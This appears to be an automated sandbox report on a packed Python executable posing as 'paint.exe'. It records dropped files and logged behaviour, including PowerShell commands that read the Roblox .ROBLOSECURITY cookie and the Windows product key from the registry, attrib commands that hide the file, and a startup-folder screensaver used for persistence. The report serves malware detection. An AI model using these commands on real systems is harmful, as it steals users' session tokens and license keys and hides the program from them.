Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: paint.exe, 00000001.00000002.2017457879.00007FFE11511000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: paint.exe, 00000001.00000002.2019931710.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: paint.exe, 00000001.00000002.2017803927.00007FFE11EA1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: paint.exe, 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000058.00000000.1922631309.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: paint.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: paint.exe, 00000001.00000002.2019092977.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: paint.exe, 00000001.00000002.2018365437.00007FFE11EC1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr

Source: paint.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: paint.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: paint.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: paint.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: paint.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: api-ms-win-core-console-l1-1-0.dll.0.dr

Static PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"

Source: C:\Users\user\Desktop\paint.exe

Code function: 1_2_00007FFDFB029060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFB029060

Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA09327 push rsp; ret	1_2_00007FFDFAA09328
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA082D8 push rdi; iretd	1_2_00007FFDFAA082DA
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA08419 push r10; retf	1_2_00007FFDFAA08485
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05C31 push r10; ret	1_2_00007FFDFAA05C33
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA0808B push r12; iretd	1_2_00007FFDFAA0809F
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05F01 push r12; ret	1_2_00007FFDFAA05F10
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA08F42 push rsp; iretq	1_2_00007FFDFAA08F43
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05F56 push r12; ret	1_2_00007FFDFAA05F73
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA07689 push r12; ret	1_2_00007FFDFAA076CD
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05E67 push rdi; iretd	1_2_00007FFDFAA05E69
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05EB4 push rsp; iretd	1_2_00007FFDFAA05EB5
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA07FFF push r12; ret	1_2_00007FFDFAA0804A
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA06859 push rsi; ret	1_2_00007FFDFAA06890
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA07F67 push rbp; iretq	1_2_00007FFDFAA07F68
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05F7B push r8; ret	1_2_00007FFDFAA05F83
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05FB9 push r10; ret	1_2_00007FFDFAA05FCC
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05D06 push r12; ret	1_2_00007FFDFAA05D08
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05CE5 push r8; ret	1_2_00007FFDFAA05CEB
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05CE0 push r10; retf	1_2_00007FFDFAA05CE2
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05CED push rdx; ret	1_2_00007FFDFAA05CF7
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05E18 push rsp; ret	1_2_00007FFDFAA05E1C
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA05DF7 push r10; retf	1_2_00007FFDFAA05DFA
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA0763E push rbp; retf	1_2_00007FFDFAA07657
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA08DBF push rsp; retf	1_2_00007FFDFAA08DC0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFE00784331 push rcx; ret	1_2_00007FFE00784332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9922D2A5 pushad ; iretd	12_2_00007FFD9922D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD99348607 push ebx; ret	12_2_00007FFD9934860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD993484CB push ebx; ret	12_2_00007FFD993484CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9934852B push ebx; ret	12_2_00007FFD9934852A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD993484FA push ebx; ret	12_2_00007FFD9934852A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD9934841D push ebx; ret	12_2_00007FFD993484CA

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\paint.exe

Process created: "C:\Users\user\Desktop\paint.exe"

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\paint.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\paint.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Source: C:\Users\user\Desktop\paint.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
